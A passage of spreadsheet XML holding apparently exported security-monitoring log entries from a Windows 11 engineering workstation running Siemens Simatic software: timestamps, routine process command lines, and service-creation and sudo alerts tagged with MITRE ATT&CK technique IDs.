    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 0 -NGENProcess 19c -Pipe 318 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.663</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 304 -InterruptEvent 0 -NGENProcess 20c -Pipe 230 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.698</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 328 -InterruptEvent 0 -NGENProcess 2f0 -Pipe 2e8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.700</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 0 -NGENProcess 2c8 -Pipe 304 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.722</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 318 -InterruptEvent 0 -NGENProcess 238 -Pipe 2e0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.754</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 360 -InterruptEvent 0 -NGENProcess 354 -Pipe 35c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.790</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 320 -InterruptEvent 0 -NGENProcess 330 -Pipe 318 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.800</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 324 -InterruptEvent 0 -NGENProcess 238 -Pipe 26c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.815</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.861</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 280 -InterruptEvent 0 -NGENProcess 238 -Pipe 2c0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.882</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 380 -InterruptEvent 0 -NGENProcess 2e4 -Pipe 37c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.884</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3bc -InterruptEvent 0 -NGENProcess 3b0 -Pipe 3b8 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.885</t>
  </si>
  <si>
    <t>wmiadap.exe /F /T /R</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.895</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3bc -InterruptEvent 0 -NGENProcess 2d8 -Pipe 320 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.948</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 32c -InterruptEvent 0 -NGENProcess 390 -Pipe 330 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.964</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 37c -InterruptEvent 0 -NGENProcess 36c -Pipe 38c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:04.987</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3a4 -InterruptEvent 0 -NGENProcess 38c -Pipe 3b0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.032</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 368 -InterruptEvent 0 -NGENProcess 338 -Pipe 21c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.070</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 340 -InterruptEvent 0 -NGENProcess 338 -Pipe 19c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.074</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.096</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 384 -InterruptEvent 0 -NGENProcess 38c -Pipe 3bc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.111</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 350 -InterruptEvent 0 -NGENProcess 39c -Pipe 360 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.141</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 218 -InterruptEvent 0 -NGENProcess 37c -Pipe 38c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.143</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 340 -InterruptEvent 0 -NGENProcess 32c -Pipe 3bc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.155</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 32c -InterruptEvent 0 -NGENProcess 38c -Pipe 340 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.206</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 20c -InterruptEvent 0 -NGENProcess 358 -Pipe 34c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.235</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 0 -NGENProcess 38c -Pipe 2f0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.247</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 37c -InterruptEvent 0 -NGENProcess 33c -Pipe 390 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 37c -InterruptEvent 0 -NGENProcess 324 -Pipe 218 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.267</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3a0 -InterruptEvent 0 -NGENProcess 328 -Pipe 32c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.298</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 348 -InterruptEvent 0 -NGENProcess 3b4 -Pipe 3ac -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.312</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3a0 -InterruptEvent 0 -NGENProcess 39c -Pipe 37c -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.375</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 33c -InterruptEvent 0 -NGENProcess 344 -Pipe 378 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.376</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 3a0 -InterruptEvent 0 -NGENProcess 328 -Pipe 2d0 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.377</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe -StartupEvent 22c -InterruptEvent 0 -NGENProcess 230 -Pipe 228 -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.401</t>
  </si>
  <si>
    <t>\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\" install \"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\" /NoDependencies /noroot /version:v4.0.30319 /LegacyServiceBehavior</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.449</t>
  </si>
  <si>
    <t>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe -StartupEvent 178 -InterruptEvent 0 -NGENProcess 1f0 -Pipe bc -Comment \"NGen Worker Process\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.530</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{76535960-46BB-4E5A-8689-A3AAA9206ECB}\\MicrosoftEdge_X64_136.0.3240.50_135.0.3179.98.exe\" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.532</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.568</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{76535960-46BB-4E5A-8689-A3AAA9206ECB}\\EDGEMITMP_9C38D.tmp\\setup.exe\" --install-archive=\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{76535960-46BB-4E5A-8689-A3AAA9206ECB}\\MicrosoftEdge_X64_136.0.3240.50_135.0.3179.98.exe\" --previous-version=\"135.0.3179.98\" --msedge --verbose-logging --do-not-launch-msedge --system-level --channel=stable</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.570</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{76535960-46BB-4E5A-8689-A3AAA9206ECB}\\EDGEMITMP_9C38D.tmp\\setup.exe\" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\\WINDOWS\\SystemTemp\\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=136.0.7103.49 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{76535960-46BB-4E5A-8689-A3AAA9206ECB}\\EDGEMITMP_9C38D.tmp\\setup.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=136.0.3240.50 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff79742f3e8,0x7ff79742f3f4,0x7ff79742f400</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.591</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.638</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\svchost.exe -k CameraMonitor</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.708</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.727</t>
  </si>
  <si>
    <t>/QuitInfo:00000000000009E4;0000000000000290;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.750</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.846</t>
  </si>
  <si>
    <t>Failed attempt to perform a privileged operation</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.849</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.853</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.854</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.855</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.869</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:05.948</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:06.038</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:06.041</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:06.042</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:06.045</t>
  </si>
  <si>
    <t>taskhostw.exe SBServicing</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:06.961</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:07.463</t>
  </si>
  <si>
    <t>PAM: Login session closed.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:23.308</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:26.302</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\uus\\packages\\preview\\AMD64\\MoUsoCoreWorker.exe\" useprivatenamespaces</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:19:36.503</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe2_ Global\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:07.628</t>
  </si>
  <si>
    <t>Successful sudo to ROOT executed.</t>
  </si>
  <si>
    <t>[T1548.003]</t>
  </si>
  <si>
    <t>[Privilege Escalation, Defense Evasion]</t>
  </si>
  <si>
    <t>[Sudo and Sudo Caching]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:07.629</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:07.645</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:13.647</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:17.681</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:33.312</t>
  </si>
  <si>
    <t>10.12.25.5</t>
  </si>
  <si>
    <t>Windows11EWS</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:34.438</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:34.441</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:34.635</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:35.864</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:35.981</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:36.342</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:37.227</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\Common Files\\Siemens\\Automation\\Simatic OAM\\bin\\TC.exe\" -flush</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:37.803</t>
  </si>
  <si>
    <t>Apparmor DENIED</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:38.450</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:39.617</t>
  </si>
  <si>
    <t>\"C:\\PROGRAM FILES (X86)\\COMMON FILES\\SIEMENS\\ACE\\BIN\\SCSDIALOGX.EXE\" -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:39.717</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:39.739</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\servicing\\TrustedInstaller.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:39.756</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:40.971</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:40.990</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:41.125</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:41.126</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:41.127</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:41.808</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:43.332</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:43.444</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:43.832</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:44.402</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:44.452</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:44.483</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:44.551</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:46.089</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\sihclient.exe  /cv qtTdS/O/Z0Co8K7on6RD4A.0.2</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:47.239</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:47.341</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:47.364</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:47.406</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:47.421</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:47.438</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:48.906</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:48.943</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:48.949</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:51.421</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:51.422</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:52.378</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:53.325</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:53.430</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:53.543</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:54.573</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:55.807</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:56.536</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:57.040</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:58.433</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:58.434</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:58.865</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:20:58.874</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:00.432</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\Common Files\\Siemens\\Automation\\Simatic OAM\\bin\\s7epasrv64x.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:00.434</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:00.455</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:00.772</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\AarSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k AarSvcGroup -p</t>
  </si>
  <si>
    <t>[T1543.003]</t>
  </si>
  <si>
    <t>[Persistence, Privilege Escalation]</t>
  </si>
  <si>
    <t>[Windows Service]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:00.799</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k BthAppGroup -p</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k BcastDVRUserService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:00.800</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CaptureService_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:00.821</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k ClipboardSvcGroup -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:00.822</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:00.871</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CloudBackupRestoreSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:00.898</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:00.921</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\CredentialEnrollmentManager.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:01.019</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:01.103</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:01.257</t>
  </si>
  <si>
    <t>Windows audit failure event</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:01.263</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k DevicesFlow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:01.468</t>
  </si>
  <si>
    <t>sihost.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:01.583</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\MessagingService_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:01.749</t>
  </si>
  <si>
    <t>\"C:\\PROGRAM FILES\\COMMON FILES\\SIEMENS\\ALMPANELPLUGIN\\ALMPANELPLUGIN.EXE\" -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:01.759</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\NPSMSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:01.781</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:01.840</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:01.894</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:02.038</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:02.112</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:02.128</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\P9RdrService_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k P9RdrService -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:02.233</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:02.457</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PenService_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k PenService</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:02.540</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:02.585</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:02.852</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k PrintWorkflow</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:03.089</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UdkUserSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UdkSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:03.394</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\System32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:03.557</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:03.697</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:03.814</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\webthreatdefusersvc_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:04.232</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_ac556\\ImagePath binary is: C:\\WINDOWS\\system32\\svchost.exe -k UnistackSvcGroup</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:05.284</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:05.582</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:05.583</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:06.670</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\userinit.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:06.941</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\Explorer.EXE</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:07.068</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:21:07.468</t>
  </si>
  <si>
